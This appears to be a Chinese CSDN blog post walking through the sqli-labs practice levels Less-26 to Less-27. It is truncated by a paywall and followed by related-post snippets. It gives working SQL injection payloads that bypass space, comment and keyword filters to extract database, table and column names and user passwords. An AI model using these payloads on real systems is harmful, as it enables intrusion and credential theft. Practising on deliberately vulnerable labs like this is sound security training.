sqli-labs ----less-26---37--练习

最新推荐文章于 2024-10-13 22:58:49 发布
最新推荐文章于 2024-10-13 22:58:49 发布
阅读量997 收藏
点赞数
分类专栏: 笔记 文章标签: 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/123326529
版权
本文详细介绍了在sqli-labs的Less-26到Less-37关卡中如何利用SQL注入漏洞进行绕过策略,包括空格和注释的转义、利用%00、大小写绕过、布尔型和时间盲注等方法,涉及数据库查询、信息获取等技巧。
摘要由CSDN通过智能技术生成

sqli-labs————Less-26(绕空格、/*、#等)

该关卡提示空格和注释被转义,我们测试一下:


http://www.sqli.com/Less-26/?id=1’报错

sqli-labs-master/Less-26/?id=1’ --+ 依旧报错,

我添加的注释不见了,应该是注释被转义成了空字符,我们换成;%00测试一下:

http://www.sqli.com/Less-26/?id=1%20and%20sleep(4);%00

and应该被转义了 phpstorm 抓一下包看看

除了用;%00绕过,我们还可以使用id=1’ or ‘1’=’1进行绕过,但是要注意该关卡的or和空格都进行了转义,空格可以使用编码%0A代替,但是在Windows phpstudy环境下,空白字符编码无效,所以我们无法使用空格。

由于无法使用空格,因此
http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ (oorrder by 4);%00这种语句都无法使用,我们使用报错注入:

  1. 替换:如 and 可替换为 && ,or 可替换为 ||

获取当前数据库

select * from users where id='1' union (select(extractvalue(1,concat(0x7e,database()))));%00

获取所有数据库:

但是这里长度有限制,无法全部取出

http://127.0.0.1/sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (group_concat(schema_name)) from (infoorrmation_schema.schemata) )))));%00

获取security库中的表:

select * from users where id='1' || (select (extractvalue(1,concat(0x7e,(select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema=0x7365637572697479))))));%00

获取users库中字段:

select * from users where id='1' || (select (extractvalue(1,concat(0x7e,(select (group_concat(column_name)) from (
infoorrmation_schema.columns) where ((table_schema=0x7365637572697479) aandnd (table_name=0x7573657273)))))));%00 注意and也需要双写:

获取username和password字段的信息:

注意password中or需要双写,由于长度限制,使用group_concat()函数无法取出全部数据,而且空格被转义,所有limit函数也无法使用,因此我们使用where(id=1)来定位数据,这样可以取出全部数据。

sqli-labs-master/Less-26/?id=1’ || (select (extractvalue(1,concat(0x7e,(select (concat(username,0x7e,passwoorrd)) from (security.users) where (id=1))))));%00

sqli-labs————Less-27(union and等)

提示好像是 union and b被过滤了

确定注入参数值类型,

id=1’报错 过滤了 1=1 1=

最低0.47元/天 解锁文章
嗯光
关注
专栏目录
Sqlilabs Less-26
Light_inthe_eyes的博客
03-23 603
判断是单引号字符注入: ?id=1'' 当接下来进行操作时会发现很多被注释掉了,查看源码黑名单过滤了很多:or、and、空格等等: function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_r
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
m0_54899775的博客
12-30 1893
sqli-labs Less - 62、63、64、65(sqli-labs闯关指南 62、63、64、65)
SQLi LABS Less 25 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-28 1万+
SQLi 第二十五关,SQLi-LABS Less-25,SQLi-LABS Less 25,SQLiLABS Less25,SQLi Less 25
Sqli-labs之Less-26和Less-26a
m0_46315342的博客
06-04 2184
                                          &nbs...
sqli-labs】 less26 GET- Error based -All you SPACES and COMMENTS belong to us(GET型基于错误的去除了空格和注释的注入)...
ajxi63204的博客
01-27 296
看了下源码 所有的注释形式和反斜线,and,or都被了过滤掉了 单引号没有过滤 空格也被过滤了 http://localhost/sqli-labs-master/Less-26/?id=1' http://localhost/sqli-labs-master/Less-26/?id=1' ' 看了网上的一些方法都是使用了%a0替换掉了空格 ...
Sqli-labs less 26
weixin_34388207的博客
08-11 222
Less-26 TIPS:本关可能有的朋友在windows下无法使用一些特殊的字符代替空格,此处是因为apache的解析的问题,这里请更换到linux平台下。 本关结合25关,将空格,or,and,/*,#,--,/等各种符号过滤,此处对于and,or的处理方法不再赘述,参考25.此处我们需要说明两方面:对于注释和结尾字符的我们此处只能利用构造一个 ' 来闭合后面到 ' ;对于空格,有较多的...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs靶场Less-5
songling515010475的专栏
08-20 247
1、访问首页,/Less-5/index.php?id=1,这里的传参点是id 探测五步曲 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 搬出自己准备好的5步曲......好尴尬......慢慢有点难度了哟 结论:通过单引号闭合, 再用and 1=1 与 and 1=2控制条件,发现即不报错又能控制显示的文字。 2、判断字段数量 http://192.168.60.142:8080/sqlilabs/L..
Sqli-labs之Less-37
→_→
05-07 441
Less-37 POST型 - 绕过 MYSQL_real_escape_string 本关与 34 关是大致相似的,区别在于处理 post 内容用的是 mysql_real_escape_string() 函数,而不是 addslashes()函数,但是原理是一直的, 查看源码...
sqli-labs————Less-26(绕空格、/*、#等)
Fly_鹏程万里
05-16 2410
Less-26从这里的提示,我们可以看出这一关过滤了空格。我们可以查看源代码,看看它的过滤机制:function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out A...
[网络安全]sqli-labs Less-26 解题详析
等风来
10-21 2130
以上为[网络安全]sqli-labs Less-26 解题详析,我是秋说,我们下次见。
sqli-labs-less-32~37
giun的博客
02-14 434
我们先介绍下宽字节注入 原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ Less-32 http://127.0.0.1/sqli-labs-master/Less-32/?id=1' 会发现对\进行了过滤 http:/...
sqli-labs less-26 空格绕过
最新发布
wanggonghanfei的博客
10-13 934
sqli-labs less-26 空格绕过
sqli-less-26-less26a
沐目的博客
04-18 1064
less-26 单引号 GET型 这关就有点过滤的意思了,过滤了上一关的东西,并且把空格和%23给过滤了。如果是ubuntu的话,可以用/**/,%0a等绕过,方便一些。但我的是windows,所以就只能用()了。让后使用||来代替and,用‘1来闭合。 数据库: -1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1 表: 1’|...
SQLi-LABS Less-26&&Less-26a
m0_64898960的博客
04-27 2238
Less-26题目 测试出需要“ ’ ”进行闭合 经过一番尝试,发现or和and继续坐在ban位上,然后空格和一些符号如“+”也坐上了ban位… 可以利用报错函数,便可以不用理会空格的威胁… 查表 Less-26a Less-26a需要使用“ ') ”进行闭合 继续尝试报错注入,发现报错注入已经没有我们想要的东西回显了… 只好根据题目,进行bool盲注即可 Less-26a总结 判断是否存在小括号 一开始怎么尝试都没有答案出来,后来百度原来还有个小括号,然后学习了一下如何判断是否还有小括号…真是裂
Less-26
老司机开代码的博客
08-04 758
文章目录1. 题目分析2. 思路分析2.1 不用空格2.1.1 报错注入2.1.2 盲注2.2 使用特殊字符代替空格 1. 题目分析 这道题的坑算是比较多的了,我们来分析一下。 通过初步测试发现这个题目过滤的东西有点多,直接看源码 function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id);
sqli-labs通关攻略教程六(less26~less28a)
m0_55854679的博客
07-21 868
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
MySQL注入实战指南——Sqli-labs教程解析
这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 1. **SQL注入 (SQLi) 和 sqli-labs介绍*...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值